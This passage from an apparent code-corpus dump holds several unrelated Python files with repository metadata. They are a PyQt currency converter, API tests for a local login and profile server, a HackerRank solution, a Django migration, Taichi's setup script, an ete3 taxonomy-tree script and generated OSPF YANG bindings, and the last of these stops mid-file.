2) self.valor_1.setText(str(self.valor_1.text())) self.valor_2.setText(str(calcular).replace('.', ',')) elif dinheiro_input == 'Real' and dinheiro_resultado == 'Real': calcular = (float(self.valor_1.text()) * self._coletaR) calcular = round(calcular, 2) self.valor_1.setText(str(self.valor_1.text())) self.valor_2.setText(str(calcular).replace('.', ',')) # Euro elif dinheiro_input == 'Real' and dinheiro_resultado == 'Euro': calcular = (float(self.valor_1.text()) / self._coletaE) calcular = round(calcular, 2) self.valor_1.setText(str(self.valor_1.text())) self.valor_2.setText(str(calcular).replace('.', ',')) elif dinheiro_input == 'Dollar' and dinheiro_resultado == 'Euro': calcular = (float(self.valor_1.text()) / self._coletaE * self._coletaD) calcular = round(calcular, 2) self.valor_1.setText(str(self.valor_1.text())) self.valor_2.setText(str(calcular).replace('.', ',')) elif dinheiro_input == 'Iene' and dinheiro_resultado == 'Euro': calcular = (float(self.valor_1.text()) / self._coletaE * self._coletaI) calcular = round(calcular, 4) self.valor_1.setText(str(self.valor_1.text())) self.valor_2.setText(str(calcular).replace('.', ',')) elif dinheiro_input == 'Euro' and dinheiro_resultado == 'Euro': calcular = (float(self.valor_1.text())) calcular = round(calcular, 4) self.valor_1.setText(str(self.valor_1.text())) self.valor_2.setText(str(calcular).replace('.', ',')) # Dollar elif dinheiro_input == 'Iene' and dinheiro_resultado == 'Dollar': calcular = (float(self.valor_1.text()) / self._coletaD * self._coletaI) calcular = round(calcular, 4) self.valor_1.setText(str(self.valor_1.text())) self.valor_2.setText(str(calcular).replace('.', ',')) elif dinheiro_input == 'Real' and dinheiro_resultado == 'Dollar': calcular = (float(self.valor_1.text()) / self._coletaD * self._coletaR) calcular = round(calcular, 4) self.valor_1.setText(str(self.valor_1.text())) self.valor_2.setText(str(calcular).replace('.', ',')) elif dinheiro_input == 'Euro' and dinheiro_resultado == 'Dollar': calcular = (float(self.valor_1.text()) / self._coletaD * self._coletaE) calcular = round(calcular, 4) self.valor_1.setText(str(self.valor_1.text())) self.valor_2.setText(str(calcular).replace('.', ',')) elif dinheiro_input == 'Dollar' and dinheiro_resultado == 'Dollar': calcular = (float(self.valor_1.text())) calcular = round(calcular, 4) self.valor_1.setText(str(self.valor_1.text())) self.valor_2.setText(str(calcular).replace('.', ',')) # Iene elif dinheiro_input == 'Iene' and dinheiro_resultado == 'Iene': calcular = (float(self.valor_1.text())) calcular = round(calcular, 4) self.valor_1.setText(str(self.valor_1.text())) self.valor_2.setText(str(calcular).replace('.', ',')) elif dinheiro_input == 'Euro' and dinheiro_resultado == 'Iene': calcular = (float(self.valor_1.text()) / self._coletaI * self._coletaE) calcular = round(calcular, 4) self.valor_1.setText(str(self.valor_1.text())) self.valor_2.setText(str(calcular).replace('.', ',')) elif dinheiro_input == 'Dollar' and dinheiro_resultado == 'Iene': calcular = (float(self.valor_1.text()) / self._coletaI * self._coletaD) calcular = round(calcular, 4) self.valor_1.setText(str(self.valor_1.text())) self.valor_2.setText(str(calcular).replace('.', ',')) elif dinheiro_input == 'Real' and dinheiro_resultado == 'Iene': calcular = (float(self.valor_1.text()) / self._coletaI * self._coletaR) calcular = round(calcular, 4) self.valor_1.setText(str(self.valor_1.text())) self.valor_2.setText(str(calcular).replace('.', ',')) except: self.valor_1.setText(str(1)) pass if __name__ == '__main__': aplicativo = QApplication(sys.argv) tela = Converter() tela.show() aplicativo.exec_()
354576907f5498701abdb951f5c1359827eeacec
288c275059393a9a858b93530a08226ecf8ecb96
/test.py
1fa9b919f2c903d351d804cddc3fb6e68bd258e7
[]
no_license
L3-S6-Projet/test_server
cfae24b6106d8e593f403b24617397a8b6d17684
bd3811d320f3decc98d1c4043f729291b695ce35
refs/heads/master
2022-08-23T19:47:49.920740
2020-05-09T11:08:27
2020-05-09T11:08:27
266,430,251
0
0
null
null
null
null
UTF-8
Python
false
false
8,276
py
import unittest import requests BASE_URL = 'http://127.0.0.1:3030/api/' # Tests assume the following account are created, and will be re-created as-is with a POST to /api/reset: # {'first_name': 'Admin', 'last_name': 'User', 'username': 'admin', 'password': 'admin'} # {'first_name': 'Teacher', 'last_name': 'User', 'username': 'teacher', 'password': 'teacher'} # {'first_name': 'Student', 'last_name': 'User', 'username': 'student', 'password': 'student'} # Tests are not safe to run in parallel - they might manipulate the same accounts at the same time. def validate_object(data, schema, _path=''): '''Checks that a dict follows a schema. Can check for either type or value equality.''' if type(schema) == dict: assert type(data) == dict, f'{_path} is not a dict' for key, key_schema in schema.items(): validate_object(data[key], key_schema, _path=_path + f'.{key}') elif type(schema) == list: assert type(data) == list, f'{_path} is not a list' for index, item in enumerate(data): validate_object(item, schema[0], _path=_path + f'[{index}]') elif type(schema) == type: assert type( data) == schema, f'{_path} is of type {type(data)}, but should have been {schema}' else: assert data == schema, f'{_path} equals "{data}", where it should have been "{schema}"' def get_token(username, password=None): res = requests.post(BASE_URL + 'session', json={ 'username': username, 'password': username if password is None else password, }) assert res.status_code == 200, res.status_code return res.json()['token'] def validate_error_response(res, code): validate_object(res, { 'status': 'error', 'code': code, }) def validate_simple_success_response(res): validate_object(res, { 'status': 'success' }) def reset(): res = requests.get(BASE_URL + 'reset') assert res.text == '"ok"' class TestSessionRoutes(unittest.TestCase): @classmethod def setUpClass(self): reset() def test_post_session(self): user_schema_admin = { 'first_name': 'Admin', 'last_name': 'User', 'kind': 'administrator', } user_schema_teacher = { 'first_name': 'Teacher', 'last_name': 'User', 'kind': 'teacher', } user_schema_student = { 'first_name': 'Student', 'last_name': 'User', 'kind': 'student', } parameters = ( ('admin', user_schema_admin), ('teacher', user_schema_teacher), ('student', user_schema_student) ) for username, user_schema in parameters: with self.subTest(msg='Checks that the user can login', username=username): res = requests.post(BASE_URL + 'session', json={ 'username': username, 'password': username, }) assert res.status_code == 200, res.status_code validate_object(res.json(), { 'status': 'success', 'token': str, 'user': user_schema, }) def test_post_session_invalid_credentials(self): res = requests.post(BASE_URL + 'session', json={ 'username': 'not-found', 'password': 'invalid-password' }) assert res.status_code == 403, res.status_code validate_error_response(res.json(), 'InvalidCredentials') def test_delete_session(self): token = get_token('admin') res = requests.delete(BASE_URL + 'session', headers={ 'Authorization': f'Bearer {token}' }) assert res.status_code == 200, res.status_code validate_simple_success_response(res.json()) def test_delete_session_invalid_token(self): res = requests.delete(BASE_URL + 'session', headers={ 'Authorization': 'Bearer somerandomfaketoken' }) assert res.status_code == 403, res.status_code validate_error_response(res.json(), 'InvalidCredentials') class TestProfileRoutes(unittest.TestCase): def setUp(self): reset() def test_put_profile_not_authorized(self): res = requests.put(BASE_URL + 'profile', headers={ 'Authorization': 'Bearer somerandomfaketoken' }, json={}) assert res.status_code == 403, res.status_code validate_error_response(res.json(), 'InvalidCredentials') def test_put_profile_first_name_last_name_without_admin(self): for prop in ('first_name', 'last_name'): for username in ('teacher', 'student'): with self.subTest(msg='Checks that the property cant be edited', prop=prop, username=username): token = get_token(username) res = requests.put(BASE_URL + 'profile', headers={ 'Authorization': f'Bearer {token}' }, json={prop: 'new value'}) assert res.status_code == 401, res.status_code validate_error_response( res.json(), 'InsufficientAuthorization') def test_put_profile_password_without_old(self): token = get_token('admin') res = requests.put(BASE_URL + 'profile', headers={ 'Authorization': f'Bearer {token}' }, json={ 'password': 'newpassword' }) assert res.status_code == 400, res.status_code validate_error_response(res.json(), 'MalformedData') def test_put_profile_old_password_without_new(self): token = get_token('admin') res = requests.put(BASE_URL + 'profile', headers={ 'Authorization': f'Bearer {token}' }, json={ 'old_password': 'oldpassword' }) assert res.status_code == 400, res.status_code validate_error_response(res.json(), 'MalformedData') def test_put_profile_wrong_old_password(self): token = get_token('admin') res = requests.put(BASE_URL + 'profile', headers={ 'Authorization': f'Bearer {token}' }, json={ 'old_password': 'wrongpassword', 'password': 'newpassword', }) assert res.status_code == 403, res.status_code validate_error_response(res.json(), 'InvalidOldPassword') def test_put_profile_can_change_password(self): for account in ('admin', 'teacher', 'student'): with self.subTest(msg='Checks that the user can change their password', account=account): token = get_token(account) res = requests.put(BASE_URL + 'profile', headers={ 'Authorization': f'Bearer {token}' }, json={ 'old_password': account, 'password': 'newpassword' }) assert res.status_code == 200, res.status_code validate_simple_success_response(res.json()) res = requests.post(BASE_URL + 'session', json={ 'username': account, 'password': account, }) assert res.status_code == 403, res.status_code validate_error_response(res.json(), 'InvalidCredentials') get_token(account, 'newpassword') def test_put_profile_admin_can_change_first_name_last_name(self): token = get_token('admin') res = requests.put(BASE_URL + 'profile', headers={ 'Authorization': f'Bearer {token}' }, json={ 'first_name': 'NewAdminFirstName', 'last_name': 'NewAdminLastName', }) assert res.status_code == 200, res.status_code validate_simple_success_response(res.json()) res = requests.post(BASE_URL + 'session', json={ 'username': 'admin', 'password': 'admin', }) assert res.status_code == 200, res.status_code assert res.json()['user']['first_name'] == 'NewAdminFirstName' assert res.json()['user']['last_name'] == 'NewAdminLastName' if __name__ == '__main__': unittest.main()
9a96327791724d1b20140f28c67f7738ba9fefab
04a344a58278fb01a4cfda67624403b5a0870e26
/Divisible_Sum_Pairs.py
41fa8dfb1d4141a93cb7413d7fc6c855a3c2889f
[]
no_license
aleksiheikkila/HackerRank_Python_Problems
ed33f4a161e72003f45eabd3df58d7d537767934
c758911abede97196883b0909d21879616d12d33
refs/heads/master
2023-01-09T02:55:48.952599
2022-12-27T19:33:00
2022-12-27T19:33:00
201,996,607
0
0
null
null
null
null
UTF-8
Python
false
false
1,094
py
''' HackerRank problem Domain : Python Author : Aleksi Heikkilä Created : Aug 2019 Problem : https://www.hackerrank.com/challenges/divisible-sum-pairs/problem ''' #!/bin/python3 import math import os import random import re import sys # Complete the divisibleSumPairs function below. def divisibleSumPairs(n, k, ar): """ Complete the divisibleSumPairs function. It should return the integer count of pairs meeting the criteria. divisibleSumPairs has the following parameter(s): n: the integer length of array ar: an array of integers k: the integer to divide the pair sum by """ valid_pairs = [[i, j] for i in range(n) for j in range(i+1, n) if (ar[i] + ar[j]) % k == 0] return len(valid_pairs) if __name__ == '__main__': fptr = open(os.environ['OUTPUT_PATH'], 'w') nk = input().split() n = int(nk[0]) k = int(nk[1]) ar = list(map(int, input().rstrip().split())) result = divisibleSumPairs(n, k, ar) fptr.write(str(result) + '\n') fptr.close()
f56bfe1662a5f51d41b144269ef27b7a458bc3ee
47a18d699d29f8a617f8c53c67208df2739ac4f4
/home/migrations/0006_forgetpass.py
f9da5622bc3dc3a349aded8e147e968027888b11
[]
no_license
achieverz-sport/Achieverz
c79b154ae3814c14a84acd55b6817c0279303680
09eead46159b8434b8718aa7b2aab51a7e26c4db
refs/heads/main
2022-12-24T23:57:23.156024
2020-10-05T10:46:27
2020-10-05T10:46:27
301,354,863
0
0
null
null
null
null
UTF-8
Python
false
false
573
py
# Generated by Django 3.1.1 on 2020-09-24 13:13 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('home', '0005_auto_20200924_1155'), ] operations = [ migrations.CreateModel( name='forgetpass', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('email', models.CharField(max_length=20)), ('key', models.CharField(max_length=20)), ], ), ]
0a8e2bc6532dbb507eb9601893e5e6fd4777f437
3f5a7cd3b55349e63344972829abe47cf8b26987
/canshu_a.py
ccf5f05c9711bd8eab63aa5fc9f46e2ef04f0fec
[]
no_license
cruzereiz/-
266ef5ef0db66d69a592e46c66459aebf9ae4abd
9d7826b203e2e1d345a863961be09d1116edb370
refs/heads/main
2023-04-15T21:55:54.633605
2021-04-28T01:26:27
2021-04-28T01:26:27
362,299,900
2
0
null
null
null
null
UTF-8
Python
false
false
354
py
import json def canshu_a(id): model_id = '{"rid":"R_SO_4_1492901593","threadId":"R_SO_4_1492901593","pageNo":"1","pageSize":"50","cursor":"-1","offset":"0",' \ '"orderType":"1","csrf_token":""}' b = json.loads(model_id) b['rid'] = 'R_SO_4_{}'.format(id) b['threadId'] = 'R_SO_4_{}'.format(id) return json.dumps(b)
deb2567b32d956ed4e674ed4a6c3b42550b00a4f
21b965f430ee6fd5772d65b2ce54287d461479ee
/python/setup.temp.py
23c01c8b4b42c53bc870791a1788a41415ce5b6b
[ "MIT" ]
permissive
hoojaoh/taichi
9610266386229957a2c0bb7f6afcaaad3c83a746
641c4b83bcf98e7354b135964cd23759b0110c6b
refs/heads/master
2023-08-31T07:33:58.991208
2019-11-01T20:01:46
2019-11-01T20:01:52
78,141,490
0
0
MIT
2019-11-01T22:20:18
2017-01-05T19:24:06
C++
UTF-8
Python
false
false
1,142
py
import setuptools import glob classifiers = [ 'Development Status :: 1 - Planning', 'Topic :: Multimedia :: Graphics', 'Topic :: Games/Entertainment :: Simulation', 'Intended Audience :: Science/Research', 'Intended Audience :: Developers', 'License :: OSI Approved :: MIT License', 'Programming Language :: Python :: 3.6', 'Programming Language :: Python :: 3.7', 'Programming Language :: C++', ] data_files = glob.glob('python/lib/*') print(data_files) packages = setuptools.find_packages() print(packages) setuptools.setup( name=project_name, packages=packages, version=version, description='The Taichi Programming Language', author='Yuanming Hu', author_email='[email protected]', url='https://github.com/yuanming-hu/taichi', install_requires=[ 'numpy', 'Pillow', 'scipy', 'pybind11', 'colorama', 'setuptools', 'astor', 'matplotlib' ], data_files=[('lib', data_files)], keywords=['graphics', 'simulation'], license='MIT', platforms=['Linux'], include_package_data=True, classifiers=classifiers, has_ext_modules=lambda: True )
7b185abe18bf28f13c874b2a769fb91bd47c5b9b
b2f01680e78cf5b64c779425790e10b31ab82fc0
/A_plot_Bacteria/taxonomy_tree.py
ff79577f0b8644bddf8d8b65a47b89bcd7dce471
[]
no_license
stormlovetao/rnaSeq
fcdfca39434aaa26dc5ef17ed84ea99b8743f7ff
61b5051024f701a983acb52278fef4a9a03af1dc
refs/heads/master
2021-01-10T03:30:55.952913
2017-03-07T21:22:35
2017-03-07T21:22:35
47,236,130
0
0
null
null
null
null
UTF-8
Python
false
false
1,607
py
#export PATH=~/anaconda_ete/bin:$PATH from ete3 import NCBITaxa ncbi = NCBITaxa() ####### BRAINCODE viruses taxonomy tree ######## fp_in = open("/PHShome/tw786/localView/overview/Tree/BRAINCODE_viruses.txt") viruses1 = fp_in.readlines() viruses1 = [x.strip() for x in viruses1] viruses_taxid = ncbi.get_name_translator(viruses1) viruses_taxid = [x[0] for x in viruses_taxid.values()] tree = ncbi.get_topology(viruses_taxid) file_path = "/PHShome/tw786/localView/overview/Tree/BRAINCODE_viruses_tree.txt" fp = open(file_path, 'w') print>>fp, tree.get_ascii(attributes=['sci_name','rank']) fp_in.close() fp.close() ####### GTEx viruses taxonomy tree ######## fp_in = open("/PHShome/tw786/localView/overview/Tree/GTEx_viruses.txt") viruses2 = fp_in.readlines() viruses2 = [x.strip() for x in viruses2] viruses_taxid = ncbi.get_name_translator(viruses2) viruses_taxid = [x[0] for x in viruses_taxid.values()] tree = ncbi.get_topology(viruses_taxid) file_path = "/PHShome/tw786/localView/overview/Tree/GTEx_viruses_tree.txt" fp = open(file_path, 'w') print>>fp, tree.get_ascii(attributes=['sci_name','rank']) fp_in.close() fp.close() ####### BRAINCODE + GTEx viruses taxonomy tree ######## viruses_merge = viruses1 + viruses2 viruses_merge = list(set(viruses_merge)) viruses_taxid = ncbi.get_name_translator(viruses_merge) viruses_taxid = [x[0] for x in viruses_taxid.values()] tree = ncbi.get_topology(viruses_taxid) file_path = "/PHShome/tw786/localView/overview/Tree/BRAINCODE+GTEx_viruses_tree.txt" fp = open(file_path, 'w') print>>fp, tree.get_ascii(attributes=['sci_name','rank']) fp_in.close() fp.close()
f5108df754338fad2dcde10f801f7e363935eaff
20035d7de00f51adbfd43b6c08ecc4f651f45ab4
/backend/services/text_similarity/application/configuration.py
eb0d765bae34d702cf38ee30afffda3ab96d6fe9
[ "MIT" ]
permissive
R-aryan/Text-Similarity-Using-BERT
3f40d2deb8b8b73f5428f47be37662251fa0d436
edba09c0da2b21d50532facc1237c2e7ffae10bd
refs/heads/main
2023-08-07T19:50:13.727391
2021-09-27T06:06:37
2021-09-27T06:06:37
409,261,165
0
0
null
2021-09-27T06:06:38
2021-09-22T15:38:08
Python
UTF-8
Python
false
false
639
py
from injector import Module, singleton from common.logging.console_logger import ConsoleLogger from services.text_similarity.application.ai.inference.prediction import PredictionManager from services.text_similarity.application.ai.training.src.preprocess import Preprocess from services.text_similarity.settings import Settings class Configuration(Module): def configure(self, binder): logger = ConsoleLogger(filename=Settings.LOGS_DIRECTORY) binder.bind(ConsoleLogger, to=logger, scope=singleton) binder.bind(PredictionManager, to=PredictionManager(preprocess=Preprocess(), logger=logger), scope=singleton)
b4377f15b5571bc63d5c60b1a5df7257600bce43
a479a5773fd5607f96c3b84fed57733fe39c3dbb
/napalm_yang/models/openconfig/network_instances/network_instance/protocols/protocol/ospfv2/areas/area/lsdb/lsa_types/lsa_type/lsas/lsa/as_external_lsa/types_of_service/type_of_service/state/__init__.py
868a2ec6db7e8ae231952e4752d89bc0dcf1bd68
[ "Apache-2.0" ]
permissive
napalm-automation/napalm-yang
839c711e9294745534f5fbbe115e0100b645dbca
9148e015b086ebe311c07deb92e168ea36fd7771
refs/heads/develop
2021-01-11T07:17:20.226734
2019-05-15T08:43:03
2019-05-15T08:43:03
69,226,025
65
64
Apache-2.0
2019-05-15T08:43:24
2016-09-26T07:48:42
Python
UTF-8
Python
false
false
40,677
py
# -*- coding: utf-8 -*- from operator import attrgetter from pyangbind.lib.yangtypes import RestrictedPrecisionDecimalType from pyangbind.lib.yangtypes import RestrictedClassType from pyangbind.lib.yangtypes import TypedListType from pyangbind.lib.yangtypes import YANGBool from pyangbind.lib.yangtypes import YANGListType from pyangbind.lib.yangtypes import YANGDynClass from pyangbind.lib.yangtypes import ReferenceType from pyangbind.lib.base import PybindBase from collections import OrderedDict from decimal import Decimal from bitarray import bitarray import six # PY3 support of some PY2 keywords (needs improved) if six.PY3: import builtins as __builtin__ long = int elif six.PY2: import __builtin__ class state(PybindBase): """ This class was auto-generated by the PythonClass plugin for PYANG from YANG module openconfig-network-instance - based on the path /network-instances/network-instance/protocols/protocol/ospfv2/areas/area/lsdb/lsa-types/lsa-type/lsas/lsa/as-external-lsa/types-of-service/type-of-service/state. Each member element of the container is represented as a class variable - with a specific YANG type. YANG Description: Per-TOS parameters for the LSA """ __slots__ = ( "_path_helper", "_extmethods", "__forwarding_address", "__external_route_tag", "__tos", "__metric", ) _yang_name = "state" _pybind_generated_by = "container" def __init__(self, *args, **kwargs): self._path_helper = False self._extmethods = False self.__forwarding_address = YANGDynClass( base=RestrictedClassType( base_type=RestrictedClassType( base_type=six.text_type, restriction_dict={ "pattern": "(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?" }, ), restriction_dict={"pattern": "[0-9\\.]*"}, ), is_leaf=True, yang_name="forwarding-address", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace="http://openconfig.net/yang/network-instance", defining_module="openconfig-network-instance", yang_type="inet:ipv4-address-no-zone", is_config=False, ) self.__external_route_tag = YANGDynClass( base=RestrictedClassType( base_type=long, restriction_dict={"range": ["0..4294967295"]}, int_size=32, ), is_leaf=True, yang_name="external-route-tag", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace="http://openconfig.net/yang/network-instance", defining_module="openconfig-network-instance", yang_type="uint32", is_config=False, ) self.__tos = YANGDynClass( base=RestrictedClassType( base_type=int, restriction_dict={"range": ["0..255"]}, int_size=8 ), is_leaf=True, yang_name="tos", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace="http://openconfig.net/yang/network-instance", defining_module="openconfig-network-instance", yang_type="uint8", is_config=False, ) self.__metric = YANGDynClass( base=RestrictedClassType( base_type=int, restriction_dict={"range": ["0..65535"]}, int_size=16 ), is_leaf=True, yang_name="metric", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace="http://openconfig.net/yang/network-instance", defining_module="openconfig-network-instance", yang_type="oc-ospf-types:ospf-metric", is_config=False, ) load = kwargs.pop("load", None) if args: if len(args) > 1: raise TypeError("cannot create a YANG container with >1 argument") all_attr = True for e in self._pyangbind_elements: if not hasattr(args[0], e): all_attr = False break if not all_attr: raise ValueError("Supplied object did not have the correct attributes") for e in self._pyangbind_elements: nobj = getattr(args[0], e) if nobj._changed() is False: continue setmethod = getattr(self, "_set_%s" % e) if load is None: setmethod(getattr(args[0], e)) else: setmethod(getattr(args[0], e), load=load) def _path(self): if hasattr(self, "_parent"): return self._parent._path() + [self._yang_name] else: return [ "network-instances", "network-instance", "protocols", "protocol", "ospfv2", "areas", "area", "lsdb", "lsa-types", "lsa-type", "lsas", "lsa", "as-external-lsa", "types-of-service", "type-of-service", "state", ] def _get_forwarding_address(self): """ Getter method for forwarding_address, mapped from YANG variable /network_instances/network_instance/protocols/protocol/ospfv2/areas/area/lsdb/lsa_types/lsa_type/lsas/lsa/as_external_lsa/types_of_service/type_of_service/state/forwarding_address (inet:ipv4-address-no-zone) YANG Description: The destination to which traffic for the external prefix should be advertised. When this value is set to 0.0.0.0 then traffic should be forwarded to the LSA's originator """ return self.__forwarding_address def _set_forwarding_address(self, v, load=False): """ Setter method for forwarding_address, mapped from YANG variable /network_instances/network_instance/protocols/protocol/ospfv2/areas/area/lsdb/lsa_types/lsa_type/lsas/lsa/as_external_lsa/types_of_service/type_of_service/state/forwarding_address (inet:ipv4-address-no-zone) If this variable is read-only (config: false) in the source YANG file, then _set_forwarding_address is considered as a private method. Backends looking to populate this variable should do so via calling thisObj._set_forwarding_address() directly. YANG Description: The destination to which traffic for the external prefix should be advertised. When this value is set to 0.0.0.0 then traffic should be forwarded to the LSA's originator """ if hasattr(v, "_utype"): v = v._utype(v) try: t = YANGDynClass( v, base=RestrictedClassType( base_type=RestrictedClassType( base_type=six.text_type, restriction_dict={ "pattern": "(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?" }, ), restriction_dict={"pattern": "[0-9\\.]*"}, ), is_leaf=True, yang_name="forwarding-address", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace="http://openconfig.net/yang/network-instance", defining_module="openconfig-network-instance", yang_type="inet:ipv4-address-no-zone", is_config=False, ) except (TypeError, ValueError): raise ValueError( { "error-string": """forwarding_address must be of a type compatible with inet:ipv4-address-no-zone""", "defined-type": "inet:ipv4-address-no-zone", "generated-type": """YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=six.text_type, restriction_dict={'pattern': '(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'}), restriction_dict={'pattern': '[0-9\\.]*'}), is_leaf=True, yang_name="forwarding-address", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='inet:ipv4-address-no-zone', is_config=False)""", } ) self.__forwarding_address = t if hasattr(self, "_set"): self._set() def _unset_forwarding_address(self): self.__forwarding_address = YANGDynClass( base=RestrictedClassType( base_type=RestrictedClassType( base_type=six.text_type, restriction_dict={ "pattern": "(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?" }, ), restriction_dict={"pattern": "[0-9\\.]*"}, ), is_leaf=True, yang_name="forwarding-address", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace="http://openconfig.net/yang/network-instance", defining_module="openconfig-network-instance", yang_type="inet:ipv4-address-no-zone", is_config=False, ) def _get_external_route_tag(self): """ Getter method for external_route_tag, mapped from YANG variable /network_instances/network_instance/protocols/protocol/ospfv2/areas/area/lsdb/lsa_types/lsa_type/lsas/lsa/as_external_lsa/types_of_service/type_of_service/state/external_route_tag (uint32) YANG Description: An opaque tag that set by the LSA originator to carry information relating to the external route """ return self.__external_route_tag def _set_external_route_tag(self, v, load=False): """ Setter method for external_route_tag, mapped from YANG variable /network_instances/network_instance/protocols/protocol/ospfv2/areas/area/lsdb/lsa_types/lsa_type/lsas/lsa/as_external_lsa/types_of_service/type_of_service/state/external_route_tag (uint32) If this variable is read-only (config: false) in the source YANG file, then _set_external_route_tag is considered as a private method. Backends looking to populate this variable should do so via calling thisObj._set_external_route_tag() directly. YANG Description: An opaque tag that set by the LSA originator to carry information relating to the external route """ if hasattr(v, "_utype"): v = v._utype(v) try: t = YANGDynClass( v, base=RestrictedClassType( base_type=long, restriction_dict={"range": ["0..4294967295"]}, int_size=32, ), is_leaf=True, yang_name="external-route-tag", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace="http://openconfig.net/yang/network-instance", defining_module="openconfig-network-instance", yang_type="uint32", is_config=False, ) except (TypeError, ValueError): raise ValueError( { "error-string": """external_route_tag must be of a type compatible with uint32""", "defined-type": "uint32", "generated-type": """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="external-route-tag", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='uint32', is_config=False)""", } ) self.__external_route_tag = t if hasattr(self, "_set"): self._set() def _unset_external_route_tag(self): self.__external_route_tag = YANGDynClass( base=RestrictedClassType( base_type=long, restriction_dict={"range": ["0..4294967295"]}, int_size=32, ), is_leaf=True, yang_name="external-route-tag", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace="http://openconfig.net/yang/network-instance", defining_module="openconfig-network-instance", yang_type="uint32", is_config=False, ) def _get_tos(self): """ Getter method for tos, mapped from YANG variable /network_instances/network_instance/protocols/protocol/ospfv2/areas/area/lsdb/lsa_types/lsa_type/lsas/lsa/as_external_lsa/types_of_service/type_of_service/state/tos (uint8) YANG Description: OSPF encoding of the type of service referred to by this LSA. Encoding for OSPF TOS are described in RFC2328. """ return self.__tos def _set_tos(self, v, load=False): """ Setter method for tos, mapped from YANG variable /network_instances/network_instance/protocols/protocol/ospfv2/areas/area/lsdb/lsa_types/lsa_type/lsas/lsa/as_external_lsa/types_of_service/type_of_service/state/tos (uint8) If this variable is read-only (config: false) in the source YANG file, then _set_tos is considered as a private method. Backends looking to populate this variable should do so via calling thisObj._set_tos() directly. YANG Description: OSPF encoding of the type of service referred to by this LSA. Encoding for OSPF TOS are described in RFC2328. """ if hasattr(v, "_utype"): v = v._utype(v) try: t = YANGDynClass( v, base=RestrictedClassType( base_type=int, restriction_dict={"range": ["0..255"]}, int_size=8 ), is_leaf=True, yang_name="tos", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace="http://openconfig.net/yang/network-instance", defining_module="openconfig-network-instance", yang_type="uint8", is_config=False, ) except (TypeError, ValueError): raise ValueError( { "error-string": """tos must be of a type compatible with uint8""", "defined-type": "uint8", "generated-type": """YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..255']}, int_size=8), is_leaf=True, yang_name="tos", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='uint8', is_config=False)""", } ) self.__tos = t if hasattr(self, "_set"): self._set() def _unset_tos(self): self.__tos = YANGDynClass( base=RestrictedClassType( base_type=int, restriction_dict={"range": ["0..255"]}, int_size=8 ), is_leaf=True, yang_name="tos", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace="http://openconfig.net/yang/network-instance", defining_module="openconfig-network-instance", yang_type="uint8", is_config=False, ) def _get_metric(self): """ Getter method for metric, mapped from YANG variable /network_instances/network_instance/protocols/protocol/ospfv2/areas/area/lsdb/lsa_types/lsa_type/lsas/lsa/as_external_lsa/types_of_service/type_of_service/state/metric (oc-ospf-types:ospf-metric) YANG Description: The metric value to be used for the TOS specified. This value represents the cost of use of the link for the specific type of service. """ return self.__metric def _set_metric(self, v, load=False): """ Setter method for metric, mapped from YANG variable /network_instances/network_instance/protocols/protocol/ospfv2/areas/area/lsdb/lsa_types/lsa_type/lsas/lsa/as_external_lsa/types_of_service/type_of_service/state/metric (oc-ospf-types:ospf-metric) If this variable is read-only (config: false) in the source YANG file, then _set_metric is considered as a private method. Backends looking to populate this variable should do so via calling thisObj._set_metric() directly. YANG Description: The metric value to be used for the TOS specified. This value represents the cost of use of the link for the specific type of service. """ if hasattr(v, "_utype"): v = v._utype(v) try: t = YANGDynClass( v, base=RestrictedClassType( base_type=int, restriction_dict={"range": ["0..65535"]}, int_size=16 ), is_leaf=True, yang_name="metric", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace="http://openconfig.net/yang/network-instance", defining_module="openconfig-network-instance", yang_type="oc-ospf-types:ospf-metric", is_config=False, ) except (TypeError, ValueError): raise ValueError( { "error-string": """metric must be of a type compatible with oc-ospf-types:ospf-metric""", "defined-type": "oc-ospf-types:ospf-metric", "generated-type": """YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..65535']},int_size=16), is_leaf=True, yang_name="metric", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='oc-ospf-types:ospf-metric', 